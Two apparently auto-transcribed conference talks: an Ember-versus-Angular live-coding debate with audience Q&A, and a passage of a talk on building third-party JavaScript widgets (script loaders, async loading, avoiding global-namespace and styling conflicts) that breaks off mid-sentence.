blog posts. And so again, inside of here, we could say, well, do we need anything to be injected into here right now? No, I don't. And so I'll just do the simplest thing. I hate this UI. So first thing I'm going to do is I'm going to tell it I want this to be... I want this to... Whoopsie. Sorry. Return. Yeah, why do you use this? This is WebStorm. Restricts. Rob's fat fingers. Okay, restricts. E, that sounds pretty intuitive. Yeah. Pretty... Isn't that neat? Yeah. Transclusion. Everybody run. So I'm going to just say... I'm going to put an H1 in here just for now and just say blog posts. So what I've done here is I've just said this is a directive. It's got a name, blog posts, and it's going to be an element on my page. By default, it's an attribute. You can also have it be a comment. You can have it be a class. So you basically can have this directive attach itself to the DOM in a couple of different ways. So that E means element. Yeah, E means element. So... Oh, look that one up on the cheat sheet. Yeah, I know, right? As to which one you choose, that's up to you. So the way I'd use this is let's put it inside of here and I would just say blog posts, bam, and jeez, what are the chances I did this right? So up it comes... Oh, because I need to be on the homepage. There it is. So it just shows up, blog posts. It renders the things straight in. Now if I wanted to do more, let's say I had to work with data or do other things, I could come in here and say this has got its own controller and I could either specify it by name or create the function right in line right here. Typo. Thanks. No one else heard that, right? Anyway, I could specify the name of the function here. It'll be called invoked and then I could have controllers backing this directive and that's how you do that. What if you want more than one HTML element? You can do the same thing with directive templates. You can say it's a template URL and specify that somewhere else on the server. I was actually going to talk more about directives later so I'm going to sidestep this, but that's kind of how you do it, but it's not exactly the same thing. Because you need it to be conditional. Well, it's not tied to a URL, which I think is an important difference. Yes. I really do. I think it's very, very important to note that. Okay. Okay. Let's get to a little bit more meat in all of this then. Yeah, this is actually meaningful. It's actually interactive, something in the real world. Because I mean, currently this is all very academic and you seem to be typing for a long time. It's good actually. It seems to angle is really good. It's why I do videos. Yeah. If you want to like, practice your typing, it seems like the way to go. Or if you want to make your manager think you're really busy all the time. Exactly. I mean, it's all about lines of code, right? So. You're on my side. Yeah. I was on your side. That's what's going on. Until you watch your typing. You're letting me down here. Sorry. I'm hoping you're going to bring this back. I'm coming. What's a dollar scope? Oh, sorry. Oh, wow. We'll talk about that in a second. Okay. Go ahead. Yeah. So if we want to interact with a remote service now. So I make your lives about 100 times more difficult now. Or maybe not. Maybe you can show me how easy it is to do this in Ember. Sure. Let's do it. Okay. So. I mean, you pre-built something, haven't you, for doing this? Well, what I've got is actually Rob has prepared for me a node endpoint. It's just a JSON endpoint that is returning some data. So how do I get this probably go to localhost 3000 slash API. Yep. Okay. So this is our JSON payload. So I think what we want to do is basically just turn this into the model that backs our template. So as I was saying before. Oh. I told you it was going to make it. Is that photo going to make an appearance? All right. For all of us. These prices in Norwegian Kroner or dollars. Yes. All of them. All right. So the way that we do this. So in Ember, like I said, the way that you want to think about it is just these series of nested templates and each of those templates is backed by a model of some kind. Now the way that we tell a template, which model that should represent is by creating this route. I showed you my little trick of shaking the stage. Am I back in California? Where is this earthquake? No distractions. This is the big one. We're standing about 200 feet over the ground. Doesn't matter. This API basically writes itself. Oh. Okay. So. That is a throw down right there, my friend. So what we'll just do here is we'll say app.application route. Let me go delete all of my templates. So we'll delete these and I've got my application template here. So all I want to do is basically say what the model for this template is. So we'll do a model. This is just a hook basically that returns whatever data you want represented. And then we'll just use good old dollar.getjson here. And this URL is a slash API. It's weird because that looks just like jQuery. Yeah, weird, right? Yeah. Totally. You're just using jQuery. Why reinvent the wheel? Why have a transclusion generator, HDP resource provider? Or why use ember is kind of what I'm thinking. Because we did have degrees for something. That's right. Yeah, remember I got to look busy. So I'm just going to say return dollar.getjson API. Now if I look on here, I basically see that there's a title. So let's just make sure that this is working. So I'll just put in title here. This is basically just going to pull this attribute off the model. So can I just ask when you return from getjson, that's returning a promise, right? Yes, that's correct. So basically the model hook knows how to deal with promises. So if you return a promise, it just waits until it renders the template until that data is finished loading. So do you guys know what promises are in JavaScript? So it's basically saying there's something that's going to return from this. And when it's done, you call this function basically, right? Yeah, so a lot of times you have to work with that manually, but that's kind of interesting that Ember will do that for you. See, I'm being nice right now. Have you noticed that? Thanks Rob, I appreciate it. It's kind of like holding it up and powerling it. I'm just waiting. I'm completely avoided callback soup at this point, which is a good thing. Yeah, no callbacks at all. Just return the promise and Ember knows how to handle it. So that's what a lot of people think. Like if they're not from the JavaScript world, they look at some JavaScript code, it's just callback, callback, callback nested. Yeah, what are they like? It's like the V from hell. Yeah, callback help. So I'll put an H1 here for the title, the other attribute here is we have description and then we have some orders. So we'll just say like P description. And then to loop over all of these orders, I'll say each orders. And that's just handlebars code, right? This is just handlebars syntax. And then each side, each of these we have a macro. Did I say code? It's actually... If you learn handlebars, you have another entry for your CV. So another technology to learn. Well, and we require jQuery. So it's like... Yeah, it's a win all the way around. There's a bonus for me this year. Okay, so we've got number and we've got description and I'll put in price here. Okay, and I'll just make this a UL. Actually, oh homie, I'm so sorry for what I'm about to do. Let's make this a table. We'll make this a table and we'll just put in a TR here and we'll say number and we'll say... This is what tables are for. Weird. I hate seeing this. You see this complain. Someone say, oh, someone used a table on a page for tabular data. That's kind of what they're for. I know. Tabular data. Just don't avoid them at all costs. Okay. So inside of here, I'll put another TR. And then we'll say TD. I think your tags are a little bit wonky. My tags are super wonky. Okay. Is that how you're supposed to do it with Ember? I just don't have a... Just do wonky tags and somehow I prefer... I'm not old enough for an IDE yet. Okay. And then we'll just close the table. Okay, so... Cool. There we go. So you can see we've got our table. The description, this is all being pulled from the local host, the server, basically all pulling it from a JSON API. Very nice. All right. Come on, Rob. Come on. I know. I know I've got that kind of sound now in my voice, but you're going to show us how easy this is. I keep hearing how powerful and easy Angular is to get started with, so I'm just waiting to see it. You're just a very good presenter. Ah, well, well practiced, perhaps. It's not that Rob runs a company that sells screencasts already. No, he has definitely not done any professional. He records them like 20 times and then picks the best one. That is some design power, my friend, right there. Wow. Okay. Those 99 designs. This is exactly. So let's work with some data. And so I'm doing that. I've got the same exact thing over here. So if I go to slash API, there it is. Boom. Okay. Isn't that just... Look at that. Don't you guys just want to be me? So let's go back over here and... All right. So the first thing I'm going to do is let's take out this about route so I can buy myself some real estate here. And inside my controller now, I am going to just do a simple HTTP call. So just like with everything in Angular, I need to latch on to something that will do that for me. So I need to take it in a dependency, HTTP. And so right off the bat, I will just say HTTP.get. There's my typing skill. See now, Peter, you've crawled inside my head. So the good thing is we were talking about, like, you know, how you can make more money doing this because there's more lines of code. And you see dollar signs everywhere which kind of reinforces that point. So I'm going to give this thing scope.api equals hpbi.get slash api. And that's it. Okay. So what are we doing here? What is the scope thing which you asked about? Scope is the thing that works between the controller and the template. It is the magical little transport vehicle for all things. You kind of prepare this little chunk of stuff and it's got functions embedded on it. It's got data embedded on it. I'll show you more in just a second. But this is basically, this is it. So now I've got scope.api and inside of here. I will do, let's see. So anyone else notice that all of the quote marks in this code are all closing quotes? Yeah. That just kind of really is... Yeah, what's up with that? Every time I'm looking at that, it's like, somebody's kicking in like, oh, closing quotes, what do you mean? Is that all? You see, it's totally irrelevant to the talk. You know, the quotes, you can see the code to the closing quotes. What's going on? What's going on? So far I can't actually tell the difference between this template and Ember other than you said to do a lot more typing. And there's no jQuery. I forgot I have to use... Wait, what is dollarHCP? Is that like dollarJQuery? Let's see. Why not just use jQuery? Dollar is money, remember? Yeah, right? Why reinvent the wheel? We all know how to use jQuery. Because Google didn't invent jQuery. So, what's the result? And is Rob going to blow it again? Yep. Oh, am I going to write URL? I'm blowing it. Let's see, home controller, am I doing this right? Simplice your home controller, home controller, home controller function. Maybe you forgot the TransClude function. I think you're right. Do I have this right? API. Yeah, that's the object should go straight in. Oh, that's right. No, but remember, if you're doing this at work, you're actually earning money while doing this part. Oh, I'm totally biffing this right now. I hope you bill by the hour. NGV was right. Trouble shooting, trouble shooting, trouble shooting. Do you think, is that what it is? Oh, I guess you're right. It shouldn't be. Oh, hey. Maybe we have a new expert. Maybe we should. Thank you. That's right, of course. I'm being lame. All right, so there we are. If only everyone was as pretty as Tom, right? Did I tell you I changed the data? No. All right. No. Okay, so all right, a little jet-leg craziness there. So now what I'm going to do is just use a UL tag. No, I want the table. I want the table. Let's see it. I want a table with a TR. I really want it. So this right here is called HTML. Yeah, I do like it. What you do with here, if you want to repeat everything you use, again, NG, repeat, just a regular NG tag, and so Angular works right on the DOM. So I'm going to say order in api.orders. And so inside of here, I will do, let's see, TD. And then do we know why they went with NG? Angular. Well, because that's Angular, but Angular starts with an A. Something like that. What was it? No order description? And price. Thank you. So it's, it almost looks kind of the same. Yeah. I'm going to do this. What did I do now? Jesus, thank you guys. So I'm giving a talk on Friday. Can you please make sure you're there? Bam. Okay, so there it is. But I hate to do this to you. Tell me. This price is really hideous, right? Don't you think? And this is not really a price. This is one of those things that I really like about Angular is it helps you in lots of fun ways. So what I can do over here is I can use a filter and I can tell it that this is, I believe, currency. Oh, look at that. Oh. Wow. Wow. That's nice. What's the, what's the, wow. What's your response to that then, Tom? And so here we got another one, order. What's the ordered, ordered, I think it's ordered at. Sorry guys. I'm going to just take a look at this API real quick. Purchased on, that's what I want. And, okay, so I have purchased on here and if I go back and doop, doop. So this is just a regular, all hideous date. But if I want to have it be a nicer date, I can just say date and then medium date. So refresh that. Oh, wowie, look at that. So Angular's got all kinds of stuff like this, like filters are one of the really cool things that it has. It's got things that allow you to just drop a search page in it. It's a fuzzy search over all this JSON data that you have. You can do currency, you can localize this. You can do all kinds of fun alternating silly things. So once you get past the initial like, oh, let's do a module and let's do a thing and whatever, that's when things kind of start to kick in with what Angular allows you to do. So you can easily create your own version to these filters totally from scratch. Bam, it's a JavaScript function, it works. All right, all right, all right, let's see. Take that. All right. What do you want, Peter? Do you want me to retort or do you want to hold on? Yeah, I want you to retort because I can just see like the way you pulled that cable out of his machine like, give him a hand. So that sounds nice, sounds really good. If you want your framework to be the all singing, all dancing, all everything, hopefully it provides really good currency formatting. What I'd prefer to do is rely on external library. I like to have, I like to keep my framework lightweight. I like to keep it focused on doing one thing really well and unfortunately I don't want to have to be the expert on currency or date formatting. So you like other people to do your work? Yeah. Oh, are you kidding me? I'm a programmer. So how about this? So how about I go find Accounting.js, which is a thing that I just Googled for, which I have never used before. So this will be quite the challenge and hopefully this will be your opportunity to get back at me, but hopefully Ember will have my back. No, I thought we were talking about Ember, but whatever. All right. So let me add, I'll call a new file called Accounting.js. Well while he's doing this, I will say that this is a big discussion in the Angular community is how much should Angular do. And a lot of people, especially the Node community, they really believe in small things targeted to do exactly what you need when you need them and they don't assume anything. So if you want to install a separate package to do a thing, you just do it. And so that's this kind of approach here that if you don't want all this formatting code to add to the bulk of Angular, then just go get the package that you need. So there's not a whole Google not invented here syndrome thing kicking in at all. Yeah, well, I don't know. It is Tom. He's kind of. Okay. So let me embiggen this so you guys can see. So I've got a, I've got an account. Did you just say embiggen? It's a perfectly prominent word. So I've got this helper. So what I'm just going to do, instead of mucking up all my HTML with this logic, it's a presentation. Well, that's not mucked up at all. No, that looks great. Let me just, don't look at the man behind the curtain, Rob. All right. So what I want to do is I'll just say ember.handlebars.helper. And what was yours called? Currency? Yes. Furncy. Furny and slip. And I'll just say return accounting.formatmoney.value. Okay. So if I have JavaScript. Okay. So if I have money over here, I'll just go into my template and I'll change price. I'll just say currency price. And now it's formatted. Nice relying on external library. And what's actually really cool about this Handlebars library is that's live updating. So if I ever have any UI or code in my application that goes and changes that underlying value, that small little Handlebars helper that we wrote will actually update automatically without any code from you. Actually, sorry. No, I was just intrigued. Who, like, the audience thought, like, just in that tiny piece? You know, who kind of won the argument there, do you think? Do you think it was Rob or do you think it was Tom? Clap if it was Tom. And Rob. Oh, I'm seeing a theme coming out here. Which is kind of a shame because I was totally biased going into this, but Tom's doing a good job here. I've got a, you know, and I've actually got a challenge to throw back that will totally nuke Rob, but I'm actually feeling kind of charitable here. I don't think I should do it. Have you got any coming the other way? I don't think I should do it. Okay. I don't. I mean, do it already. All right. All right. All right. All right. Well, what would happen? We have a TR inside of our table, right? So we have a table. What? I'm just using the library API. Presumably, you could wrap it as an AMD module and then just require it as needed. The question was, it seems bad that you have this accounting global. I didn't write the library, but like I said, I think you could wrap it in AMD if you wanted it more modular. Okay. So let's imagine that I wanted to break this up into two rows. So I want maybe the description on the first line and then after it, I want to do a separate TR. So I basically want two TRs inside my each. And I'll just move the currency down here. So basically now what we're saying is for each of these orders, instead of just one TR, we actually want to have two TRs. And if I reload the page, this is what that looks like. It seems pretty easy. Wow. You've been beaten there, Rob. Yeah. What are we doing? So basically each item, you have two TRs instead of one. This is such a subtle thing, but you can see the sweat starting to come out on this one. No. Well, I did want to talk about directives, but that's... Oh yeah. No, we can do directives. It's fine. Yeah. No, that's... Restrict, restrict, EACM, TransClude, linking function, dollar scope, islet scope. Next time I... So really go ahead and practice your English, like learning angrily. Learn always complicated words. Next time I come up with the idea for a cage match, do not go up against the writer of the library. I did that last year and I got waxed. Okay. So you want two TRs? Two TRs. All right. Toddlers and TRs? Maybe that's American. So that doesn't work for you right there? No. It's not... Is that good? No. Not exactly what I was looking for. All right. So let's see. Yeah. This was good. You sprung up. We didn't talk about this. Oh, sorry about that. All right. It's fine. It's fine. What's the stuff you wanted to get back to that you briefly mentioned? No, I'm going to try this. I'm going to try this. So app.directive... Let's see. Tom, crap. So I'm going to make this... I'm going to make this an element. God, if I pull this off, this would be crazy. I'm buying all your beers if you do this. Thanks. All right. So here's the thing. I have a choice right now. I have to explain directives in two minutes. So directives share a scope with a controller. And so when you use a directive, use it within the scope of a controller. And so they will share a scope. So that means I can share data now. And so I should be able to format it and do this, and this should work, ideally. And you can tell it that you don't want to share a scope, and directives can have their own scope. And I just wanted to point this out really quickly, because I was going to do a demo on this. I think it's incredibly important. But anyway, you come in and just tell it, here's your scope. You're isolated now from your controller, but I'm not going to do that. So what I'm going to do is I'm going to tell it, your template is that... This is the thing I was worried about. Got a multi-line string support in... HTML and JavaScript. Is that a best practice? I used to do this in, like, 1999. Get that snow effect going, you know? Document.write. This is the thing, man. I was just sitting here stressing over this, like, they're not going to... All right, so let's see, order price. I'll leave everything just the way it is. Now, this brings up the next thing. When you're using directives, you are still working with the Angular engine, the Angular templating engine. There's nothing different that I just did right here, except to move the code right in. So I don't have to say, oh, do this and do that, blah, blah, blah. So I want to point out, God, if this works, I'm going to be so blown away. Didn't we say earlier that using direct HTML was a lot better than using embedded templates? Yes, you did. I like writing that tag. Like I said, you pull us off all the beer in Norway. That's like $1,000. No! Crushing! Let's see. Let's see, what is it? Medium date. I'll tell you what, it's just... That was actually, that was a useful error message. It said, unterminated quote. Oh, okay. There you go. That was a good error message. Thank you. That was good. Shit! Crises, I'll tell you, I could probably, did I just swear? Sorry. We'll bleep it out. You know, I just... It's not a screencast. We can't edit it wrong. That's true. There's ways to do this and I can't think of what it is. Yeah, no, it's really hard. That's why I asked. All right. Next year, I think the Cage match is going to be Hawaii versus San Francisco. All right. I think we know who will win in that one. That's right. Yeah. Who's got the better tan? Actually, you got the spray on stuff. Yeah, I got the spray on. I just flew through New Jersey. So, they actually have them right there in the airport. So, you're not probably feeling quite so great at the moment. Well, you know, I'm sitting here thinking about it as I'm trying to make fun of Tom, that would be the best course of action. No, I'm trying to think like, I know there's a way to do this and I can't think of it off the top of my head. I know you can pass in things. I could pass in the order somehow. I mean, I know there's a way to do it, but it's not straightforward like what you just did. So, it turns out that actually having a templating language where you can do concepts like this ends up being a very useful thing. Yeah, absolutely. Okay. So, we're going to go to some Q&A, but the first thing, just before we do that, I want to diffuse the atmosphere on stage a bit. And I want you to both say something nice about the other one's framework. So, I'm going to start with Tom. If you have to say something nice about Angular in this context of this whole cage match, what would you say? Sure. So, unfortunately, one thing that we didn't get to during the cage match where you probably would have completely decimated us is Angular has a really fantastic testing story right now. Yeah. And that's something that I think they feature very prominently on their webpage. And I think that's really great. Now, I think architecturally we could support it, but right now we definitely don't make, we don't do a good job of making it one of the first things that you think about when you get started. So, in the same way that we make you think about URLs up front, I think Angular does a really good job of making you think about testing up front. And I think I'd like to copy that. Yeah. It's a verbal hug, isn't it? No. No. Spirit is really scratchy. Back from your point of view. Well, my biggest criticism of Ember has always been that the API is difficult to understand. For me, it's just, because I only have what, 10-second attention span, and if I don't get it, forget it. No, but once you do get it, it's fascinating that all of, as you saw Tom do, once he got it set up, you're able to start going, and you don't have to, like, you saw me go back and, oh, I got to change this. One thing he didn't do, which he would have nuclear crushed me, is now minify your code and everything would have broken, because the minifier will absolutely destroy the injection, and then, but you have to go back and then rewrite the way you did it. So you find that a lot in Angular. With Ember, you just follow their conventions and you keep moving on once you know the conventions, and it builds out really nicely. Okay. So, the absolute worst time in a conference, you can ask the questions, just before lunch. But we're going to do it anyway. If you want to ask a question, say who you want to answer the question and then go with it. I'll try and repeat the question as well. So, is there anyone? How would you test the JavaScript application that you're, what, writing? Yeah. Yeah. Did you want to? Sure. Well, that's, as Tom was saying, that's one of the benefits of using Angular is that the testing story is amazing. It's a framework called Karma, and what it does is fascinating. It runs Node.js on the server and it will actually take your JavaScript client code, stuff it in a node, and run it, and it will actually apply it to a bunch of different browsers. All, you can do a headless browser, you can test it in IE, you can do all this stuff, and it's all done virtually using the testing framework. There's a bunch of frameworks out there that you can use if you don't like the all-encompassing Karma thing, like Jasmine's really good, and it takes a bit of getting used to, but you can do it. So, I thought I would show you with just a quick example. This is a little music player. I teach an Ember training class in the States, and this is the application. It's a three-day course, and over the three days, this is the application we have people build, and I think what's really neat about this is that we actually have them do this test first kind of thing. So basically, this is the running application. You can click around. There's music. You can click the play button. I don't know if you can hear that. It's pretty neat. But anyway, if you just say test equals one, you can see we break these tests down into these different steps that you go through. So if I say go up to step 15, this is actually Q-unit, and what's really neat about this, shut up, the tests actually play the song. So this is like a full-blown integration test, and the tests are actually controlling the application, which I think is really neat. And if you scroll down to the bottom of the test runner, you can see that it's still like a fully functional application. So I think that's really neat, and I'll just show you real briefly. I prefer Q-unit. I like the simplicity. I like Urn. The maintainer is very responsive, which I think is awesome. But our tests just look like this. Let me make this a little bit bigger. I've got to say, as a Brit, calling something bomb box is the whole nice hilarious thing I've ever seen. I know no one else would pronounce it that way with the umlaut and everything. So these are our steps. This is like step one, and you can see we just have these. I think I have one that's pretty cool. So this is like testing a view in isolation. It's like some test view helpers we have, and it basically does this asynchronous testing. So that's how you test an Ember app. Okay. Anyone else? Yep, up here. So he's asked, yeah, we're stressing that these things are easy to learn, but is that the most important thing? Are they more important things to it, just being easy to learn, like being easy to maintain, and so on? Well, I think it doesn't matter how easy it is to maintain. If it's not easy to learn, no one's going to write it. The thing you have to keep in mind is that as someone who's making an open source project, putting it out on the web, you guys are really busy. And it's not like something like iOS or Android where you're going to learn the SDK no matter what because there's a pot of money at the end. On the web, it's really a more open ecosystem. So if I want to compete at all, I have to show you quick wins within the first five, ten minutes because if you don't see quick wins, you're going to bail, right? So I agree. And actually, that's for me why we spent so long building Ember is because maintainable applications are so important and having good conventions so that you can scale an application out to be bigger in features and bigger in team size, very, very important. But if we're not easy to use, no one's going to care. Yeah, just to add to that really quickly. To me, the ease of use of an API is really important. It's one of the reasons I like Angular is it kind of eases you into the concepts so you understand. So it's really important for what you're doing, the dependency injection, aha, I get it. So when things get a little more complicated, you can remember what was easy to begin with. But yeah, as things go on, nothing's easy. It's programming. Okay, technically we're out of time. But if there is one more, then we could take one more. Is that it? I don't think there is. That's good. Okay. Thank you guys. I enjoyed it, guys. Thank you. Bye.
|
This is a battle between EmberJS and Angular. Tom Dale (project lead for EmberJS) vs Rob Conery (angular). The fight is hosted by Peter Cooper.
|
10.5446/51522 (DOI)
|
Hello, everyone. Welcome to this talk. I'm going to be talking about building third-party widgets and APIs using JavaScript. I'll just start by saying some few things about myself. That's me in the picture right there on the right. A three-year soul playing around with my Commodore 64. My name is Thorsten Björnstapp. I work as a.NET consultant at Webstep here in Oslo. I consider myself a web developer. I've been working a lot with the.NET stack, but the past few years I've been doing more and more work on the website of things. You might be saying, I assume most of you know JavaScript. Yeah, I know what I mean when I say, when I'm going to talk about JavaScript, but third-party JavaScript. What is it really? I think of it like this, that the first part is the person using the web browser, looking at the web page and just using your page. And the second part, that's you guys, when you create websites for other people. So you write JavaScript running on a page, you know the environment that JavaScript is going to run in, and you know the other scripts on the page. And then you have third-party. Third-party providers of JavaScript don't know anything about the page that JavaScript is going to be displayed on or run on. So they're usually loaded from a different server, and they're probably updated independently of the actual web page that JavaScript is running on. And you don't know which frameworks are loaded on the page, and you can't really assume anything about the page that JavaScript is going to run on. So examples of third-party widgets can be, for instance, the Facebook widgets or Facebook widgets. There are a bunch of different Facebook widgets that are displayed on newspaper pages and everything. And they use your cookies when they're displayed, so they can show you information about your friends and what your friends have said about the current page. And then you have widgets, like, for instance, the discussed widgets that you have probably seen on web pages or blogs or newspapers and such in order to discuss the content of the actual page. And they give a quite powerful, threaded discussion model with avatars and everything. And they also have some admin panel where you can go and censor some posts, delete posts, and show everything about status of the widgets. And then you have, for instance, Twitter widgets that were supposed to be displayed on the page right now, but it's not. But I guess you've seen it a lot of times. It's typically the widget where you display a list of tweets, like the one on the big screen out in the hole, where you can see either all tweets regarding one search or one subject or all tweets for a person. And you also have more just plain API third-party JavaScripts, like Google Analytics, that don't really modify the DOM. They just provide the JavaScript API that you can use to report analytics back to Google so you can get everything there in the admin panel in Google Analytics. So in this talk, I'm going to be talking about how you can go about if you want to create a JavaScript widget of your own. This talk has three main sections. The first is just getting into the page and loading your first JavaScript file. And the second section is about modifying the DOM, how you can actually display content to the users, hopefully without destroying the page you're actually on. And the third part is getting data, sending data back to the server, and the security concerns regarding communication with JavaScript. So to start with, loading scripts. The first hardest part or natural point to start when you want to run JavaScript on someone else's page is to get the script actually to the page. And the most important thing here is you don't want to break the page. If someone puts your JavaScript on a page and actually destroys the page or makes it unusable, that's bad. So do not break the page at all. You have to be really careful when loading stuff. If you load any frameworks or libraries, you need to know are there, maybe they are already running on the page. So will they conflict? How are the versions? And for instance, you don't want to do JavaScript alerts. You don't want to do console logs. As in some versions of Internet Explorer, they will just fail. And you can, for instance, just load jQuery and hope it will work. You can say the page must have jQuery loaded in order to use your widget. But then again, there are a bunch of versions of jQuery. It might be modified. It might have some plugins loading into jQuery that won't work for you. And you can't really just load jQuery because those plugins that the page required might not work with your version of jQuery. So you've got to be really careful when loading jQuery. Maybe you can't really load jQuery at all, depending on the case. So there are a few things you can do because you probably need to load some libraries in order to run on the page. So you have to avoid conflicts with the scripts that might be running on the page. So the first thing is globals. You want to keep globals to minimum. Preferably no global variables at all. And if you need any, you can probably limit yourself to just one global variable. And if you're creating an API, you probably need one global variable. So you can just use that. So when you're loading JavaScript, when you're doing things in the page, use closures and immediately mode function expressions in order to keep your variables from registering in the global scope and maybe overriding some values that are already there. So if you want to load scripts, take a look at scripts supporting no conflict. You have, for instance, jQuery, underscore, and backbone. They have a method called no conflict, which after the scripts are loaded, you can call no conflict and they will remove themselves from the global namespace and restore the variable to the original value. That way you can just load jQuery, call no conflict, and keep a reference to the version of jQuery that you loaded while the page will still see the original version of jQuery. Just be careful when loading scripts like jQuery asynchronously when the page is loading plugins at the same time as those plugins might register on your version of jQuery instead of your other version of jQuery. So if you're loading scripts, you should try to wrap them. For instance, require.js supports, or it has an option for adding a wrapper around a script file. So when you do the optimizing build in require.js, it will hide the global scope from the script. So unless the script explicitly declares that this variable should be added to the window object, it will be added to your namespace instead. And in some cases, you might need to modify the scripts in order to have them not register to the global namespace. And if you're using require.js, you got to be aware that the variables define and require that require defines will also be in the global namespace by default. And there you have an option as well to put define and require into your own namespace. So you can just use the one global variable. And also when you're loading your own scripts, I recommend using some script loader like require.js so you won't have to put all your constructors and other factories and such into the global variable that you have. Because then other people might start to use your internal or private variables and you will have a hard time updating your scripts or changing your APIs later. So the best thing is if you are to put something into the global namespace, make sure that you only expose your public functionality. And another thing is you don't want to affect page load times. If your server goes down when someone references a JavaScript on your server, that's not really too bad. Because if your server is down, they typically get a 404 and the page just continues loading. The bad thing is if your server is overloaded for some reason, maybe someone including your script pulls something about just a be-brand, you get a lot of requests, then you start to reply really slowly to requests and things might start to block. So if your scripts load really slowly, that's bad. For instance, if your scripts are big, that's bad as well because the users will wait a long time for the scripts to download. And what happens when you deploy updates to your application and if your application pooled the recycles, then the next request might take some longer time to actually complete and the users will have a frozen page as well. So the big goal is that page should always just load as normal as possible and then your script should just load in addition to normal behavior. So I made an example application here. It's quite fancy, I think. These are some pictures of animals. And as you see, as soon as I refresh the page, all the pictures are grayed out. And then when I mouse over, I get this sweet pop-out effect. So I made this, I want to put it on Reddit or something, and then I want to visit the counter so I can see how many people have actually seen the page. So I made a very simple widget so I see how many people have visited this page. And you see, this doesn't really affect the page. The page shows up, the images show up immediately, and they're grayed out. And here I'm using a simple script tag, just like you would include, for instance, jQuery or something. And this works for the perfect case. The script serves quickly and the widget loads and everything is fine. But the problem is if this script takes a bit long to load, the page loading will block until the script has loaded and parsed and completed running. So you should at least put the script towards the bottom of the page. So at least the images will display and things will look quite nice for users. But you will notice that document ready will not trigger until your script has loaded or failed loading. So then we'll get the case where the images load, but they don't get grayed out because that's the JavaScript that's set to run on document ready. So let me see here. So this is the case. You see now I've created some delay when loading the script. And now you see the page loads and then a second later or so, one and a half seconds, then the widget loads and it displays the visitors. But until that happens, you see the images don't get grayed out and something looks off to the user. So you might think this can be solved by caching the script on the page or caching the script on the client. Then it would take just as long to load the first time, but at least it would be slow or at least it would be faster on reloads and when the user clicks on. It's not too bad if the visitor counter doesn't really display the correct value at all times. So we could cache the script for maybe a short while. But then we have the problem with updates. If we find some critical bug on some client's page and we really need to update the script and push it out to all the clients, then it's a problem if users have actually cached the script. So we need to find some solution. So the solution to actually enabling caching of the script is to use some sort of JavaScript loader. And it's quite simple, actually. We just, instead of loading the script directly on the page, we just add a reference to the loader and then when the loader is loaded, it has a reference to a version URL of the script. So loader in this case gets script version 15. And then it goes out, gets the script, and has the script to the page and then it's run. Then the script can be cached for, say, a year. So as long as the loader is never cached, the script can be cached forever. And then whenever you release a new version of the script, you update the loader to version 16 and things work. And of course, this won't help with if the server hosting the loader is low, but at least you'll solve the case with your script getting bigger. If you have included jQuery or backbone and lots of scripts and it's maybe half a megabyte, it's a good idea if you're able to cache it. So look at this example now. Now we see the page opens, the image is displaced, and they're grayed out immediately. And a while later, the counter is displayed at the bottom. So now we have the loader loading immediately, document ready is firing, and then one and a half seconds later, the script is loaded. So the loader is quite simple and you only need a couple of lines of code, so it will be quite fast to serve. And you can keep it in memory on the web server or something, put it on a CDN, so it will get served quickly. So you basically just create a script tag, set the source of the script tag, and then add it to the document. And as soon as the script tag is added to the document, it will get downloaded by the browser and then executed and run. And here you also see an example of the immediately invoked function expression that wraps the whole script, which prevents the script variable and the S variable from leaking out into the global namespace. So this script leaks no variables into global namespace. Yeah. Yeah. So I'll get back to that again. So as I mentioned on the previous slide, this is still a problem if the server with the loader is nonresponsive. So again, back to the example. Now we see the same, or actually it's worse than it was, because now we take one and a half seconds to first get the loader and then the loader adds the script before the counter appears at the bottom. So this doesn't really seem to have solved anything. But we can fix that as well. I'll get back to that. So you might be wondering why does script loading have to block the DOM anyway. For instance, in this case, it would be okay if document ready were to run and everything were to run because my script can run at any time, even after the page has loaded. And the answer is, of course, document write. Document write was included in JavaScript from way in the beginning. And it lets you write to the DOM exactly where the browser has come in the parsing. So if the browser, it starts at the top, starts parsing the HTML and then finds the JavaScript, if the JavaScript contains the document write statement, that will be written to the exact same point that the browser is at at the moment. And document write can add HTML, JavaScript, CSS, or anything to the page. So it might write something that will affect the rest of the parsing and the rest of the rendering of the DOM. So just in case, even though your script might not even include a document write statement, the browser has to stop, download the script, parse the script, run it. Normally afterwards, can it really be sure that nothing happened or at least it doesn't really care, then it can just continue parsing. So it would be nice if there's a way to say to the browser, don't care about document write, just load my script and run it. That's when we got the async keyword. We actually got the defer keyword in HTML4, which had logic that a script marked as defer would be loaded in order, or they would be loaded in parallel and then run in the same order. Async, which we got in HTML5, says just load the script and run it whenever it completes. So no matter if you're loading a big script and a small script, the small script will probably run before the big script. And of course, this is not supported everywhere, unfortunately. But we can get the same behavior using an async loader script. So we're getting a bit into inception here. This is instead of putting the script tag into your page, you put the script block into the page. You might have seen something like this for Google Analytics instead of inserting a script tag for the Google Analytics script. You're supposed to insert this weird big script block in your page instead. But the big advantage of this is that it will always get loaded asynchronously, independent of the browser. So what it does here, as I mentioned earlier, it just creates the script tag, sets the source, and also you should set the async attribute. As some browsers might stop parsing the page when it encounters the script tag if the page hasn't completed parsing already. So by setting the async property to true and adding the script dynamically like this, we're guaranteed to get async behavior when loading the script. So unfortunately, it's a bit ugly to say to everyone wanting to use your script that you have to put in these eight lines of JavaScript or how many it is on your web page. But that's just how it is. So if you go to the Google Analytics documentation, you will see, just put this script block in your code and it will work. So one thing when you get to loading is that you want to do loading right early. You want to get your loaders and the sequence of doing the async loading of the loader script and then doing the async loading of the main script. You want to get that right in your project right from the beginning because this is very hard to change later. As soon as someone has put in some script types for your script on their pages, it's really hard to get them to change that or update that later. And in the worst case, you will have to maintain separate versions of your script in order to support both the asynchronous loading and the synchronous loading. So if you just concentrate on getting the loading right early on and getting some code running on the consumer's page, then we can get working because now you have full power over the page. So over to displaying stuff. When you have scripts running on the page, you can just do whatever you are doing normally. You can, for instance, if you have reference for jQuery, you can add the, or use it to find DOM elements, add DOM elements, do anything. And you can also do that with just plain JavaScript APIs. And often the last option is often better because that's few dependencies that you need, especially on something as big as jQuery. It's better to add a few dependencies. So, yeah, when you want to put something on the page, just render it. But do not mess up the page. If you just want to show something simple like the visitor counter I showed you, then it's easy. Just put in an element with a screen on the page. But if you want to do something more fancy like the Facebook widget or the Twitter widget, you should be aware when you are starting to add CSS and start to the page. So you can load CSS on the page the way you normally add CSS on the page by actually rendering and you link tag to the page, set the href to the script or to the starsheet, and then just add it to the HTML. Then the starsheet will get loaded and apply to the page. Just be aware that you do not want to modify the styling of other elements on the page. So this is best if all the elements you are rendering 